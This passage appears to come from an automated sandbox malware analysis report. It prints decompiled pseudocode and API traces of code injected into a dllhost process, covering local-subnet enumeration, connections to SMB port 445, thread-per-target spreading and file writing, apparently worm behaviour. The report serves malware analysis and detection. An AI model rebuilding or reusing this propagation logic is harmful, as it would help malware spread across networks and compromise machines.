                                                								_t69 =  ==  ? 1 : _v16 & 0x000000ff;
                                                								_v16 =  ==  ? 1 : _v16 & 0x000000ff;
                                                								goto L10;
                                                							} else {
                                                								LocalFree( *_a4);
                                                								LocalFree(_v8);
                                                								return _v16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t44;
                                                				}
                                                				L11:
                                                			}

                                                APIs
                                                  • Part of subcall function 028649E0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,02864AE6,?), ref: 02864A03
                                                  • Part of subcall function 028649E0: GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 02864A23
                                                  • Part of subcall function 028649E0: LocalAlloc.KERNEL32(00000040,00000000,?,73B76490), ref: 02864A32
                                                  • Part of subcall function 028649E0: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02864A42
                                                • new.LIBCMT ref: 02864B07
                                                • LocalFree.KERNEL32(00000000), ref: 02864B6B
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID:
                                                • API String ID: 1503672127-0
                                                • Opcode ID: 27341c200c0cc0c56c6664673a43fa5d00404507d7a9e7f850dab0e977b2307c
                                                • Instruction ID: 82aed80ed5a6a60acfdfa4670bd5ed85e51518ddaf2634f9c6f36b088fdc45f3
                                                • Opcode Fuzzy Hash: 27341c200c0cc0c56c6664673a43fa5d00404507d7a9e7f850dab0e977b2307c
                                                • Instruction Fuzzy Hash: F151C579D00704ABDB11DFA8DD45ABEFBB0FF48318F044594EE48A6201E731AA94CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E0286AFC0() {
                                                				void* __edi;
                                                				void* _t7;
                                                				void* _t9;
                                                				signed int _t14;
                                                				signed int _t15;
                                                				void* _t18;
                                                				void* _t19;
                                                
                                                				Sleep(0xbb8); // executed
                                                				_t7 = 0;
                                                				do {
                                                					_t1 = _t7 + L"wuauclt.exe"; // 0x750077
                                                					_t14 =  *_t1 & 0x0000ffff;
                                                					_t7 = _t7 + 2;
                                                					 *(_t7 + 0x2896836) = _t14;
                                                					_t22 = _t14;
                                                				} while (_t14 != 0);
                                                				E02869D90(_t22);
                                                				_t9 = E0286AE20(_t14, _t18, _t22);
                                                				if(_t9 != 0) {
                                                					while(1) {
                                                						L4:
                                                						EnterCriticalSection(0x2895bfc);
                                                						_t15 =  *0x2895c18;
                                                						if(_t15 == 0) {
                                                							break;
                                                						}
                                                						_t19 =  *( *0x2895c14 + _t15 * 4 - 4);
                                                						 *0x2895c18 = _t15 - 1;
                                                						E02866EF0(0x2895bf8);
                                                						if(_t19 != 0) {
                                                							CreateThread(0, 0, E0286AD60, _t19, 0, 0);
                                                						}
                                                						LeaveCriticalSection(0x2895bfc);
                                                						Sleep(0x64);
                                                					}
                                                					LeaveCriticalSection(0x2895bfc);
                                                					Sleep(0xbb8);
                                                					Sleep(0x64);
                                                					goto L4;
                                                				}
                                                				return _t9;
                                                			}

                                                APIs
                                                • Sleep.KERNELBASE(00000BB8), ref: 0286AFCE
                                                • EnterCriticalSection.KERNEL32(02895BFC), ref: 0286B005
                                                • CreateThread.KERNEL32(00000000,00000000,0286AD60,?,00000000,00000000), ref: 0286B041
                                                • LeaveCriticalSection.KERNEL32(02895BFC), ref: 0286B04C
                                                • Sleep.KERNEL32(00000064), ref: 0286B050
                                                • LeaveCriticalSection.KERNEL32(02895BFC), ref: 0286B059
                                                • Sleep.KERNEL32(00000BB8), ref: 0286B060
                                                • Sleep.KERNEL32(00000064), ref: 0286B064
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Sleep$CriticalSection$Leave$CreateEnterThread
                                                • String ID:
                                                • API String ID: 2546236395-0
                                                • Opcode ID: f221ac4b18ecfefcd276b8863a5e5746e4a4880e1c328cd4ad4a66c0a46d139e
                                                • Instruction ID: ac787bad1f0e5d839649b4a040233055a375998faa5c50ae026e81f51d10864c
                                                • Opcode Fuzzy Hash: f221ac4b18ecfefcd276b8863a5e5746e4a4880e1c328cd4ad4a66c0a46d139e
                                                • Instruction Fuzzy Hash: 9701043C7843089AE625BB989C49F3D3B54EB44B0CF490409F605EB2C0DBA86450CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0286B33A
                                                • inet_addr.WS2_32(?), ref: 0286B351
                                                • htons.WS2_32(000001BD), ref: 0286B35F
                                                • connect.WS2_32(00000000,?,00000010), ref: 0286B370
                                                • closesocket.WS2_32(00000000), ref: 0286B37C
                                                • closesocket.WS2_32(00000000), ref: 0286B394
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 279130052-0
                                                • Opcode ID: 76da96c623afc5241ccc67a54dfd4fcfae4f1dfef68c265d95f27bf091a86baa
                                                • Instruction ID: 650a5b40babc126de341600c2faa0cd2850f21f76f10557095f0b6170f483178
                                                • Opcode Fuzzy Hash: 76da96c623afc5241ccc67a54dfd4fcfae4f1dfef68c265d95f27bf091a86baa
                                                • Instruction Fuzzy Hash: 9411083CA402089BCB10AFBCAD09AFEB3B5FF45324F500655E825EB2C0DF7449118792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0286B2AD
                                                • inet_addr.WS2_32(?), ref: 0286B2C4
                                                • htons.WS2_32(0000DEFC), ref: 0286B2CE
                                                • connect.WS2_32(00000000,?,00000010), ref: 0286B2DF
                                                • closesocket.WS2_32(00000000), ref: 0286B2EB
                                                • closesocket.WS2_32(00000000), ref: 0286B304
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 279130052-0
                                                • Opcode ID: a60456602036ed54590321619ead190a336b42601ce89ff64929369c1705a3c8
                                                • Instruction ID: b5acbda7ced4019fce8e10979a2dcfad3bd6ba406cb4c2d36639b657fac2cea3
                                                • Opcode Fuzzy Hash: a60456602036ed54590321619ead190a336b42601ce89ff64929369c1705a3c8
                                                • Instruction Fuzzy Hash: AF01C83DA41108ABCB10ABBCAC49AEEB7B8FF49321F510659E925D72C0DB3549148791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 63%
                                                			E02867C20() {
                                                				char _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v21;
                                                				short _v23;
                                                				char _v27;
                                                				char _v52;
                                                				char _v308;
                                                				intOrPtr _v312;
                                                				char _v316;
                                                				char _v332;
                                                				signed int _v336;
                                                				signed int _t43;
                                                				signed int _t44;
                                                				intOrPtr* _t50;
                                                				signed char* _t52;
                                                				signed int _t53;
                                                				intOrPtr* _t56;
                                                				void* _t57;
                                                				intOrPtr* _t61;
                                                				signed int _t67;
                                                				signed char* _t68;
                                                				void* _t71;
                                                				intOrPtr _t73;
                                                				signed char** _t77;
                                                				signed int _t78;
                                                				void* _t81;
                                                				signed int _t82;
                                                				intOrPtr* _t84;
                                                				signed int _t85;
                                                				void* _t86;
                                                				void* _t87;
                                                				void* _t88;
                                                
                                                				_push(0xffffffff);
                                                				_push(E0288467B);
                                                				_push( *[fs:0x0]);
                                                				_t87 = _t86 - 0x140;
                                                				_t43 =  *0x288f008; // 0xe7fe870c
                                                				_t44 = _t43 ^ _t85;
                                                				_v20 = _t44;
                                                				_push(_t44);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t81 = Sleep;
                                                				while(1) {
                                                					L1:
                                                					E02873440(_t81,  &_v308, 0, 0x100);
                                                					_t87 = _t87 + 0xc;
                                                					gethostname( &_v308, 0x100); // executed
                                                					_t50 =  &_v308;
                                                					__imp__#52(_t50); // executed
                                                					_t84 = _t50;
                                                					if(_t84 == 0) {
                                                						break;
                                                					}
                                                					_v336 = 0;
                                                					_t52 =  *( *(_t84 + 0xc));
                                                					_t72 =  *_t52 & 0x000000ff;
                                                					_t78 = _t52[1] & 0x000000ff;
                                                					_t53 = _t52[2] & 0x000000ff;
                                                					if(( *_t52 & 0x000000ff) == 0x7f) {
                                                						L15:
                                                						Sleep(0xdbba0); // executed
                                                						continue;
                                                					}
                                                					_t82 = 0;
                                                					do {
                                                						_push(_t53);
                                                						_push(_t78);
                                                						asm("xorps xmm0, xmm0");
                                                						_v52 = 0;
                                                						asm("movq [ebp-0x1f], xmm0");
                                                						asm("movups [ebp-0x2f], xmm0");
                                                						_v27 = 0;
                                                						_v23 = 0;
                                                						_v21 = 0;
                                                						E02865180( &_v52, 0x20, "%d.%d.%d.*", _t72);
                                                						_t88 = _t87 + 0x18;
                                                						_v312 = 0xf;
                                                						_v316 = 0;
                                                						_v332 = 0;
                                                						if(_v52 != 0) {
                                                							_t56 =  &_v52;
                                                							_t20 = _t56 + 1; // 0x1
                                                							_t78 = _t20;
                                                							do {
                                                								_t73 =  *_t56;
                                                								_t56 = _t56 + 1;
                                                							} while (_t73 != 0);
                                                							_t57 = _t56 - _t78;
                                                							L10:
                                                							_push(_t57);
                                                							_push( &_v52);
                                                							E02865A00(_t71,  &_v332, _t82, _t84);
                                                							_v8 = 0;
                                                							_t61 = E02867DF0( &_v332,  &_v332);
                                                							_v8 = 0xffffffff;
                                                							 *_t61 = 0;
                                                							_t62 = _v312;
                                                							if(_v312 >= 0x10) {
                                                								E02865CF0(_t71, _t78, _t82, _v332, _t62 + 1);
                                                							}
                                                							_v312 = 0xf;
                                                							_v316 = 0;
                                                							_v332 = 0;
                                                							E0286B4E0(_t71,  *((intOrPtr*)( *(_t84 + 0xc) + _t82)), 1, _t82, 0);
                                                							_t77 =  *(_t84 + 0xc);
                                                							_t87 = _t88 + 4;
                                                							if( *((short*)(_t84 + 0xa)) +  *(_t77 + _t82) >=  *_t84) {
                                                								break;
                                                							} else {
                                                								goto L13;
                                                							}
                                                						}
                                                						_t57 = 0;
                                                						goto L10;
                                                						L13:
                                                						_t67 = _v336 + 1;
                                                						_v336 = _t67;
                                                						_t82 = _t67 * 4;
                                                						_t68 =  *(_t77 + _t82);
                                                						_t72 =  *_t68 & 0x000000ff;
                                                						_t78 = _t68[1] & 0x000000ff;
                                                						_t53 = _t68[2] & 0x000000ff;
                                                					} while (( *_t68 & 0x000000ff) != 0x7f);
                                                					_t81 = Sleep;
                                                					goto L15;
                                                				}
                                                				Sleep(0x2bf20);
                                                				goto L1;
                                                			}

                                                APIs
                                                • gethostname.WS2_32(?,00000100), ref: 02867C75
                                                • gethostbyname.WS2_32(?), ref: 02867C82
                                                • Sleep.KERNEL32(0002BF20), ref: 02867C93
                                                • Sleep.KERNELBASE(000DBBA0), ref: 02867DE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Sleep$gethostbynamegethostname
                                                • String ID: %d.%d.%d.*
                                                • API String ID: 3714389383-3742512694
                                                • Opcode ID: b9ad53e3ec43f0bceebe6bd75601e86586bd89bc3746c4e64886bb1b66d42451
                                                • Instruction ID: 4b55b16a4e5998a2a1b2f977813bd6503093a5c1edfcd35b0fbe4357d6284a9c
                                                • Opcode Fuzzy Hash: b9ad53e3ec43f0bceebe6bd75601e86586bd89bc3746c4e64886bb1b66d42451
                                                • Instruction Fuzzy Hash: 1851F4788002589FEB21DB64CC58BFEBBB5FF05308F144599E459E7291DB74AA44CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 80%
                                                			E02867140(void* __eflags, CHAR* _a4) {
                                                				long _v8;
                                                				void* _v12;
                                                				long _v16;
                                                				void* _t12;
                                                				void* _t13;
                                                				int _t16;
                                                				void* _t21;
                                                				void* _t22;
                                                				long _t24;
                                                				void* _t26;
                                                				void* _t29;
                                                
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t12 = E02864AC0(_t21, _t22,  &_v12,  &_v8); // executed
                                                				if(_t12 != 0) {
                                                					_t24 = _v8;
                                                					_v16 = 0;
                                                					_t13 = CreateFileA(_a4, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                                                					_t29 = _t13;
                                                					if(_t29 == 0) {
                                                						L5:
                                                						return 0; // executed
                                                					} else {
                                                						_t26 = _v12;
                                                						_t16 = WriteFile(_t29, _t26, _t24,  &_v16, 0); // executed
                                                						_push(_t29);
                                                						if(_t16 != 0) {
                                                							FindCloseChangeNotification(); // executed
                                                							LocalFree(_t26); // executed
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							goto L5;
                                                						}
                                                					}
                                                				} else {
                                                					return _t12;
                                                				}
                                                			}

                                                APIs
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 0286718D
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 028671A5
                                                • CloseHandle.KERNEL32(00000000,?,?), ref: 028671B0
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID:
                                                • API String ID: 1065093856-0
                                                • Opcode ID: d8c0a427ee00d86a3f65367fe49ee7276d61842be275dae9b3d51428e952061a
                                                • Instruction ID: 469d4f0146f15bb98686fd2d7724314886a80844c7613d7ab56b03b650e42c1d
                                                • Opcode Fuzzy Hash: d8c0a427ee00d86a3f65367fe49ee7276d61842be275dae9b3d51428e952061a
                                                • Instruction Fuzzy Hash: 5401887DD80208B7DB209E98AC0AFEEBB7CDB45B15F104186FD04E6180D775551587E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0286B3C0(void* __ebx, void* __esi, intOrPtr _a4) {
                                                				void* __edi;
                                                				void* _t9;
                                                				void* _t11;
                                                				intOrPtr _t19;
                                                				intOrPtr _t24;
                                                				void* _t28;
                                                
                                                				_t24 = _a4;
                                                				if(_t24 != 0) {
                                                					InterlockedIncrement(0x2896a48);
                                                					_t11 = E0286B320(__ebx, _t24, _t24); // executed
                                                					_t31 = _t11;
                                                					if(_t11 != 0) {
                                                						_push(__ebx);
                                                						_push(__esi);
                                                						_t19 = E02870A6E(__esi, _t31, 0x2c);
                                                						_a4 = _t19;
                                                						E02875C70(_t19, 0x20, _t24);
                                                						_t28 = _t28 + 0x10;
                                                						 *((intOrPtr*)(_t19 + 0x20)) = 0;
                                                						 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                						 *((intOrPtr*)(_t19 + 0x28)) =  *((intOrPtr*)(_t24 + 0x28));
                                                						EnterCriticalSection(0x2896a5c);
                                                						if(E02866F70(0x2895b80) != 0) {
                                                							 *((intOrPtr*)( *0x2895b9c +  *0x2895ba0 * 4)) = _t19;
                                                							 *0x2895ba0 =  *0x2895ba0 + 1;
                                                						}
                                                						LeaveCriticalSection(0x2896a5c);
                                                					}
                                                					_push(0x2c);
                                                					E02870AA1(_t24);
                                                					return InterlockedDecrement(0x2896a48);
                                                				}
                                                				return _t9;
                                                			}










                                                APIs
                                                • InterlockedIncrement.KERNEL32(02896A48), ref: 0286B3D4
                                                  • Part of subcall function 0286B320: socket.WS2_32(00000002,00000001,00000006), ref: 0286B33A
                                                  • Part of subcall function 0286B320: inet_addr.WS2_32(?), ref: 0286B351
                                                  • Part of subcall function 0286B320: htons.WS2_32(000001BD), ref: 0286B35F
                                                  • Part of subcall function 0286B320: connect.WS2_32(00000000,?,00000010), ref: 0286B370
                                                  • Part of subcall function 0286B320: closesocket.WS2_32(00000000), ref: 0286B37C
                                                • new.LIBCMT ref: 0286B3E9
                                                • EnterCriticalSection.KERNEL32(02896A5C), ref: 0286B418
                                                • LeaveCriticalSection.KERNEL32(02896A5C), ref: 0286B445
                                                • InterlockedDecrement.KERNEL32(02896A48), ref: 0286B45D
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CriticalInterlockedSection$DecrementEnterIncrementLeaveclosesocketconnecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 2254562651-0
                                                • Opcode ID: ce0f079e87527c60bf1309ab4b0e81265f6a0744102abb84b7a168c89f9504c0
                                                • Instruction ID: 00e9663d8838546a044d9b5bb79e11b5017855790f2cb22f826de66fa838d255
                                                • Opcode Fuzzy Hash: ce0f079e87527c60bf1309ab4b0e81265f6a0744102abb84b7a168c89f9504c0
                                                • Instruction Fuzzy Hash: 1B01FEBC680304ABEB006F58EC59F7D7B69EF4576CF894008ED09D7381D77994208B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0286FB00(CHAR* __ecx, void* __edx) {
                                                				intOrPtr _v0;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v268;
                                                				char _v271;
                                                				char _v272;
                                                				char _v528;
                                                				char _v532;
                                                				struct _FILETIME _v548;
                                                				struct _FILETIME _v556;
                                                				struct _FILETIME _v564;
                                                				long _v568;
                                                				char _v832;
                                                				char _v833;
                                                				struct _OVERLAPPED* _v840;
                                                				long _v844;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t91;
                                                				void _t93;
                                                				void _t95;
                                                				void _t96;
                                                				char _t103;
                                                				signed int _t107;
                                                				signed int _t109;
                                                				signed int _t110;
                                                				signed int _t113;
                                                				char _t114;
                                                				void* _t116;
                                                				signed int _t124;
                                                				void* _t130;
                                                				long _t133;
                                                				signed int _t143;
                                                				void* _t144;
                                                				signed int _t153;
                                                				signed int _t158;
                                                				signed int _t160;
                                                				long _t166;
                                                				void* _t169;
                                                				signed int _t171;
                                                				char _t172;
                                                				signed int _t173;
                                                				void* _t175;
                                                				void* _t183;
                                                				signed int _t185;
                                                				void* _t191;
                                                				intOrPtr _t192;
                                                				char _t194;
                                                				signed int* _t195;
                                                				signed int _t198;
                                                				signed int* _t206;
                                                				char _t218;
                                                				void* _t226;
                                                				void* _t228;
                                                				void* _t234;
                                                				signed int* _t235;
                                                				signed int _t236;
                                                				CHAR* _t243;
                                                				void* _t244;
                                                				void* _t245;
                                                				signed int _t247;
                                                				signed int* _t248;
                                                				long _t250;
                                                				void* _t251;
                                                				void* _t252;
                                                				void* _t253;
                                                				signed int _t254;
                                                				signed int _t256;
                                                				signed int _t258;
                                                				signed int _t263;
                                                				signed int _t264;
                                                				void* _t268;
                                                				void* _t270;
                                                
                                                				_t217 = __edx;
                                                				_t256 = _t263;
                                                				_t264 = _t263 - 0x20c;
                                                				_t91 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t91 ^ _t256;
                                                				_t243 = __ecx;
                                                				_t169 = __edx;
                                                				if(__ecx != 0) {
                                                					_t166 = GetFileAttributesA(__ecx); // executed
                                                					if(_t166 == 0xffffffff) {
                                                						CreateDirectoryA(_t243, 0);
                                                					}
                                                				}
                                                				_t93 =  *_t169;
                                                				if(_t93 == 0) {
                                                					L21:
                                                					_pop(_t244);
                                                					return E02870A5D(_v8 ^ _t256, _t244);
                                                				} else {
                                                					_t226 = _t169;
                                                					_t183 = _t169;
                                                					do {
                                                						if(_t93 == 0x2f || _t93 == 0x5c) {
                                                							_t226 = _t183;
                                                						}
                                                						_t93 =  *(_t183 + 1);
                                                						_t183 = _t183 + 1;
                                                					} while (_t93 != 0);
                                                					if(_t226 == _t169) {
                                                						L12:
                                                						_v268 = 0;
                                                						if(_t243 != 0) {
                                                							_t191 =  &_v268 - _t243;
                                                							do {
                                                								_t103 =  *_t243;
                                                								_t243 =  &(_t243[1]);
                                                								 *((char*)(_t191 + _t243 - 1)) = _t103;
                                                							} while (_t103 != 0);
                                                						}
                                                						_t245 = _t169;
                                                						do {
                                                							_t95 =  *_t169;
                                                							_t169 = _t169 + 1;
                                                						} while (_t95 != 0);
                                                						_t171 = _t169 - _t245;
                                                						_t228 =  &_v268 - 1;
                                                						do {
                                                							_t96 =  *(_t228 + 1);
                                                							_t228 = _t228 + 1;
                                                						} while (_t96 != 0);
                                                						_t185 = _t171 >> 2;
                                                						memcpy(_t228, _t245, _t185 << 2);
                                                						if(GetFileAttributesA(memcpy(_t245 + _t185 + _t185, _t245, _t171 & 0x00000003)) == 0xffffffff) {
                                                							CreateDirectoryA( &_v268, 0);
                                                						}
                                                						goto L21;
                                                					} else {
                                                						_t234 = _t226 - _t169;
                                                						E02883DB0( &_v528, _t169, _t234);
                                                						_t264 = _t264 + 0xc;
                                                						if(_t234 >= 0x104) {
                                                							E02870E90();
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							_push(_t256);
                                                							_t258 = _t264;
                                                							_t268 = _t264 - 0x344;
                                                							_t107 =  *0x288f008; // 0xe7fe870c
                                                							_v548.dwLowDateTime = _t107 ^ _t258;
                                                							_push(_t169);
                                                							_t172 = _v532;
                                                							_push(_t234);
                                                							_t235 = _t183;
                                                							__eflags = _t235[1] - 0xffffffff;
                                                							if(_t235[1] != 0xffffffff) {
                                                								E0286F2D0( *_t235, _t217);
                                                							}
                                                							_t109 =  *_t235;
                                                							_t192 = _v0;
                                                							_t235[1] = 0xffffffff;
                                                							__eflags = _t192 -  *((intOrPtr*)(_t109 + 4));
                                                							if(_t192 <  *((intOrPtr*)(_t109 + 4))) {
                                                								__eflags = _t192 -  *((intOrPtr*)(_t109 + 0x10));
                                                								if(_t192 <  *((intOrPtr*)(_t109 + 0x10))) {
                                                									E0286EC60(_t109);
                                                									_t192 = _v0;
                                                								}
                                                								_t110 =  *_t235;
                                                								_push(_t243);
                                                								__eflags =  *((intOrPtr*)(_t110 + 0x10)) - _t192;
                                                								if( *((intOrPtr*)(_t110 + 0x10)) < _t192) {
                                                									do {
                                                										_t254 =  *_t235;
                                                										__eflags = _t254;
                                                										if(_t254 != 0) {
                                                											__eflags =  *(_t254 + 0x18);
                                                											if( *(_t254 + 0x18) != 0) {
                                                												_t217 =  *((intOrPtr*)(_t254 + 0x10)) + 1;
                                                												__eflags = _t217 -  *((intOrPtr*)(_t254 + 4));
                                                												if(_t217 !=  *((intOrPtr*)(_t254 + 4))) {
                                                													 *((intOrPtr*)(_t254 + 0x10)) = _t217;
                                                													 *((intOrPtr*)(_t254 + 0x14)) =  *((intOrPtr*)(_t254 + 0x14)) +  *((intOrPtr*)(_t254 + 0x48)) + 0x2e +  *((intOrPtr*)(_t254 + 0x50)) +  *((intOrPtr*)(_t254 + 0x4c));
                                                													_t37 = _t254 + 0x28; // 0x28
                                                													_t217 = _t37;
                                                													_t38 = _t254 + 0x78; // 0x78
                                                													_t158 = E0286E7C0(_t254, _t37, _t38, 0, 0);
                                                													_t192 = _v0;
                                                													_t268 = _t268 - 0x10 + 0x1c;
                                                													asm("sbb eax, eax");
                                                													_t160 =  ~_t158 + 1;
                                                													__eflags = _t160;
                                                													 *(_t254 + 0x18) = _t160;
                                                												}
                                                											}
                                                										}
                                                										_t153 =  *_t235;
                                                										__eflags =  *((intOrPtr*)(_t153 + 0x10)) - _t192;
                                                									} while ( *((intOrPtr*)(_t153 + 0x10)) < _t192);
                                                								}
                                                								E0286F4E0(_t172, _t235, _t217, _t235, _t192,  &_v832);
                                                								__eflags = _v568 & 0x00000010;
                                                								_t113 =  *_t172;
                                                								if((_v568 & 0x00000010) == 0) {
                                                									_t218 = _t172;
                                                									_t194 = _t172;
                                                									__eflags = _t113;
                                                									while(_t113 != 0) {
                                                										__eflags = _t113 - 0x2f;
                                                										if(_t113 == 0x2f) {
                                                											L46:
                                                											_t49 = _t194 + 1; // 0x2865105
                                                											_t218 = _t49;
                                                										} else {
                                                											__eflags = _t113 - 0x5c;
                                                											if(_t113 == 0x5c) {
                                                												goto L46;
                                                											}
                                                										}
                                                										_t50 = _t194 + 1; // 0x2896a4c
                                                										_t113 =  *_t50;
                                                										_t194 = _t194 + 1;
                                                										__eflags = _t113;
                                                									}
                                                									_t195 = _t172;
                                                									_t247 =  &_v272 - _t172;
                                                									__eflags = _t247;
                                                									do {
                                                										_t114 =  *_t195;
                                                										_t52 =  &(_t195[0]); // 0x2896a4c
                                                										_t195 = _t52;
                                                										 *((char*)(_t247 + _t195 - 1)) = _t114;
                                                										__eflags = _t114;
                                                									} while (_t114 != 0);
                                                									__eflags = _t218 - _t172;
                                                									if(_t218 != _t172) {
                                                										_t116 = _t218 - _t172;
                                                										__eflags = _t116 - 0x104;
                                                										if(_t116 >= 0x104) {
                                                											E02870E90();
                                                											asm("int3");
                                                											asm("int3");
                                                											asm("int3");
                                                											_push(_t247);
                                                											_t248 = _t195;
                                                											_push(_t235);
                                                											__eflags = _t248[1] - 0xffffffff;
                                                											if(_t248[1] != 0xffffffff) {
                                                												E0286F2D0( *_t248, _t218);
                                                											}
                                                											_t236 =  *_t248;
                                                											_t248[1] = 0xffffffff;
                                                											__eflags = _t236;
                                                											if(_t236 != 0) {
                                                												__eflags =  *(_t236 + 0x7c);
                                                												if( *(_t236 + 0x7c) != 0) {
                                                													E0286F2D0(_t236, _t218);
                                                												}
                                                												_push(_t172);
                                                												_t173 =  *_t236;
                                                												__eflags = _t173;
                                                												if(_t173 != 0) {
                                                													__eflags =  *((char*)(_t173 + 0x10));
                                                													if( *((char*)(_t173 + 0x10)) != 0) {
                                                														CloseHandle( *(_t173 + 4));
                                                													}
                                                													_push(0x20);
                                                													E02870AA1(_t173);
                                                													_t268 = _t268 + 8;
                                                												}
                                                												L02875A36(_t236);
                                                											}
                                                											__eflags = 0;
                                                											 *_t248 = 0;
                                                											return 0;
                                                										} else {
                                                											 *((char*)(_t258 + _t116 - 0x108)) = 0;
                                                											_t124 = _v272;
                                                											__eflags = _t124 - 0x2f;
                                                											if(_t124 == 0x2f) {
                                                												L58:
                                                												wsprintfA( &_v532, "%s%s",  &_v272, _t218);
                                                												_t270 = _t268 + 0x10;
                                                												_t198 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												__eflags = _t124 - 0x5c;
                                                												if(_t124 == 0x5c) {
                                                													goto L58;
                                                												} else {
                                                													__eflags = _t124;
                                                													if(_t124 == 0) {
                                                														goto L57;
                                                													} else {
                                                														__eflags = _v271 - 0x3a;
                                                														if(_v271 == 0x3a) {
                                                															goto L58;
                                                														} else {
                                                															goto L57;
                                                														}
                                                													}
                                                												}
                                                											}
                                                											goto L59;
                                                										}
                                                									} else {
                                                										_v272 = _t114;
                                                										L57:
                                                										_t247 =  &(_t235[0x50]);
                                                										wsprintfA( &_v532, "%s%s%s", _t247,  &_v272, _t218);
                                                										_t270 = _t268 + 0x14;
                                                										_t198 = _t247;
                                                										L59:
                                                										E0286FB00(_t198,  &_v272); // executed
                                                										_t130 = CreateFileA( &_v532, 0x40000000, 0, 0, 2, _v568, 0); // executed
                                                										_t175 = _t130;
                                                										__eflags = _t175 - 0xffffffff;
                                                										if(_t175 != 0xffffffff) {
                                                											E0286EF10( *_t235, _t235[0x4e]); // executed
                                                											__eflags = _t235[0x4f];
                                                											if(__eflags == 0) {
                                                												_push(0x4000);
                                                												_t144 = E02870AB4(_t247, __eflags);
                                                												_t270 = _t270 + 4;
                                                												_t235[0x4f] = _t144;
                                                											}
                                                											_v840 = 0;
                                                											while(1) {
                                                												_t221 = _t235[0x4f];
                                                												_t133 = E0286F090( *_t235, _t235[0x4f], 0x4000,  &_v833); // executed
                                                												_t250 = _t133;
                                                												_t270 = _t270 + 8;
                                                												__eflags = _t250 - 0xffffff96;
                                                												if(_t250 == 0xffffff96) {
                                                													break;
                                                												}
                                                												__eflags = _t250;
                                                												if(__eflags < 0) {
                                                													L70:
                                                													_v840 = 0x5000000;
                                                												} else {
                                                													if(__eflags <= 0) {
                                                														L68:
                                                														__eflags = _v833;
                                                														if(_v833 != 0) {
                                                															SetFileTime(_t175,  &_v556,  &_v564,  &_v548); // executed
                                                														} else {
                                                															__eflags = _t250;
                                                															if(_t250 != 0) {
                                                																continue;
                                                															} else {
                                                																goto L70;
                                                															}
                                                														}
                                                													} else {
                                                														_t143 = WriteFile(_t175, _t235[0x4f], _t250,  &_v844, 0); // executed
                                                														__eflags = _t143;
                                                														if(_t143 == 0) {
